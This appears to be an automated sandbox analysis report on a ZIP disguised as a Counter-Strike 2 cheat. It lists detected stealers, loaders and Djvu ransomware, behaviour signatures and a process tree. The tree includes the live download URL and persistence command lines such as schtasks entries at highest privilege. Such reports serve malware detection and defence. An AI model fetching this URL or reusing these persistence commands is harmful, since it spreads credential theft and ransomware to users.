Analysis Overview
Threat Level: Known bad
The file https://ivd580.com/CS2_(External_ESP_Cheat).zip?c=ANOJsmWQQwUAV10CAENaFwAGAAAAAACs was found to be: Known bad.
Malicious Activity Summary
ZGRat
RedLine payload
RisePro
Detected Djvu ransomware
Stealc
SmokeLoader
Detect ZGRat V1
RedLine
Djvu Ransomware
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Modifies Windows Firewall
Stops running service(s)
Creates new service(s)
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
Checks BIOS information in registry
Executes dropped EXE
Themida packer
.NET Reactor proctector
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Launches sc.exe
Program crash
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-25 16:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-25 16:43
Reported
2024-01-25 17:03
Platform
win11-20231215-en
Max time kernel
75s
Max time network
859s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO8FE60E68\setup.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO8FE60E68\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO8FE60E68\setup.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8FE60E68\setup.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 45.155.250.90 | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zO8FE60E68\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\7zO8FE60E68\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zO8FE60E68\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\7zO8FE60E68\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\7zO8FE60E68\setup.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8FE60E68\setup.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3213149797-706813642-929964373-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ivd580.com/CS2_(External_ESP_Cheat).zip?c=ANOJsmWQQwUAV10CAENaFwAGAAAAAACs
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9900b3cb8,0x7ff9900b3cc8,0x7ff9900b3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3832 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\file_v1_3.rar"
C:\Users\Admin\AppData\Local\Temp\7zO8FE60E68\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zO8FE60E68\setup.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Users\Admin\Documents\GuardFox\ssF8cX0XI8ScmLsPeAglNqQQ.exe
"C:\Users\Admin\Documents\GuardFox\ssF8cX0XI8ScmLsPeAglNqQQ.exe"
C:\Users\Admin\Documents\GuardFox\ylbNv2I6pJRyyq2Z6jo0C555.exe
"C:\Users\Admin\Documents\GuardFox\ylbNv2I6pJRyyq2Z6jo0C555.exe"
C:\Users\Admin\Documents\GuardFox\QvtP_jsUgsHtpp7F1y7gfce7.exe
"C:\Users\Admin\Documents\GuardFox\QvtP_jsUgsHtpp7F1y7gfce7.exe"
C:\Users\Admin\AppData\Local\Temp\is-LNM8H.tmp\H42iXnPOtFfxqvPtyRDtOu6I.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LNM8H.tmp\H42iXnPOtFfxqvPtyRDtOu6I.tmp" /SL5="$80204,6359960,54272,C:\Users\Admin\Documents\GuardFox\H42iXnPOtFfxqvPtyRDtOu6I.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2836 -ip 2836
C:\Users\Admin\Documents\GuardFox\UFGeewl8pMJT1e_JpfAftPNt.exe
"C:\Users\Admin\Documents\GuardFox\UFGeewl8pMJT1e_JpfAftPNt.exe"
C:\Users\Admin\Documents\GuardFox\fCZZsmLsAh_Dkc9KhY1C66iK.exe
"C:\Users\Admin\Documents\GuardFox\fCZZsmLsAh_Dkc9KhY1C66iK.exe"
C:\Users\Admin\Documents\GuardFox\U6tlORlZZty2irsUDKDv9iSc.exe
"C:\Users\Admin\Documents\GuardFox\U6tlORlZZty2irsUDKDv9iSc.exe"
C:\Users\Admin\Documents\GuardFox\laq4ihVEVr3AvKvHmskKG7_C.exe
"C:\Users\Admin\Documents\GuardFox\laq4ihVEVr3AvKvHmskKG7_C.exe"
C:\Users\Admin\Documents\GuardFox\8xYeBNKZAHFl38iDOmFsxuAM.exe
"C:\Users\Admin\Documents\GuardFox\8xYeBNKZAHFl38iDOmFsxuAM.exe"
C:\Users\Admin\Documents\GuardFox\FgVemMkM_gYC9B2T5mKid_K2.exe
"C:\Users\Admin\Documents\GuardFox\FgVemMkM_gYC9B2T5mKid_K2.exe"
C:\Users\Admin\Documents\GuardFox\Et7zBTck9Arc0Y2KbphAmWVJ.exe
"C:\Users\Admin\Documents\GuardFox\Et7zBTck9Arc0Y2KbphAmWVJ.exe"
C:\Users\Admin\Documents\GuardFox\49wyDbmXdmLBnze98IVVbQvu.exe
"C:\Users\Admin\Documents\GuardFox\49wyDbmXdmLBnze98IVVbQvu.exe"
C:\Users\Admin\Documents\GuardFox\xbMD5qh1qln8RrgFzm3t8Q_u.exe
"C:\Users\Admin\Documents\GuardFox\xbMD5qh1qln8RrgFzm3t8Q_u.exe"
C:\Users\Admin\Documents\GuardFox\ZhaDcBby6zPadOq8C3wVe6CV.exe
"C:\Users\Admin\Documents\GuardFox\ZhaDcBby6zPadOq8C3wVe6CV.exe"
C:\Users\Admin\Documents\GuardFox\zjpIAqEfqs8ivfHLgVi2KsYc.exe
"C:\Users\Admin\Documents\GuardFox\zjpIAqEfqs8ivfHLgVi2KsYc.exe"
C:\Users\Admin\Documents\GuardFox\BQOSFGVriAy9AKInre_hAXN4.exe
"C:\Users\Admin\Documents\GuardFox\BQOSFGVriAy9AKInre_hAXN4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 372
C:\Users\Admin\Documents\GuardFox\U6tlORlZZty2irsUDKDv9iSc.exe
"C:\Users\Admin\Documents\GuardFox\U6tlORlZZty2irsUDKDv9iSc.exe"
C:\Users\Admin\AppData\Local\Betasoft Sound Booster\SoundBooster.exe
"C:\Users\Admin\AppData\Local\Betasoft Sound Booster\SoundBooster.exe" -i
C:\Users\Admin\Documents\GuardFox\zEK0yRxdhqLQY1DTqtlcakBU.exe
"C:\Users\Admin\Documents\GuardFox\zEK0yRxdhqLQY1DTqtlcakBU.exe"
C:\Users\Admin\Documents\GuardFox\VnCu_qJVTVlY8tiAlWCcYJ7I.exe
"C:\Users\Admin\Documents\GuardFox\VnCu_qJVTVlY8tiAlWCcYJ7I.exe"
C:\Users\Admin\Documents\GuardFox\H42iXnPOtFfxqvPtyRDtOu6I.exe
"C:\Users\Admin\Documents\GuardFox\H42iXnPOtFfxqvPtyRDtOu6I.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5820 -ip 5820
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Betasoft Sound Booster\SoundBooster.exe
"C:\Users\Admin\AppData\Local\Betasoft Sound Booster\SoundBooster.exe" -s
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 600
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,7450388866708983625,15952621292592545997,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
C:\Users\Admin\Documents\GuardFox\y4yC_rPdDmdprPwTTD9davK9.exe
"C:\Users\Admin\Documents\GuardFox\y4yC_rPdDmdprPwTTD9davK9.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\RWIOEp.CPL",
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\RWIOEp.CPL",
C:\Users\Admin\AppData\Local\Temp\msvcp_win\UniversalInstaller.exe
C:\Users\Admin\AppData\Local\Temp\msvcp_win\UniversalInstaller.exe
C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe
"C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe"
C:\Users\Admin\AppData\Roaming\msvcp_win\UniversalInstaller.exe
"C:\Users\Admin\AppData\Roaming\msvcp_win\UniversalInstaller.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN kSGpykg6DSXeK1IENdHMpVjL.exe /TR "C:\Users\Admin\Documents\GuardFox\kSGpykg6DSXeK1IENdHMpVjL.exe" /F
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\3389.exe
C:\Users\Admin\AppData\Local\Temp\3389.exe
C:\Users\Admin\AppData\Local\Temp\3389.exe
C:\Users\Admin\AppData\Local\Temp\3389.exe
C:\Users\Admin\AppData\Local\Temp\1000113001\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\1000113001\e0cbefcb1af40c7d4aff4aca26621a98.exe"
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\RWIOEp.CPL",
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 392
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\RWIOEp.CPL",
C:\Users\Admin\AppData\Local\Temp\4A2F.exe
C:\Users\Admin\AppData\Local\Temp\4A2F.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3604 -ip 3604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 396
C:\Users\Admin\AppData\Local\Temp\1000114001\InstallSetup8.exe
"C:\Users\Admin\AppData\Local\Temp\1000114001\InstallSetup8.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3604 -ip 3604
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
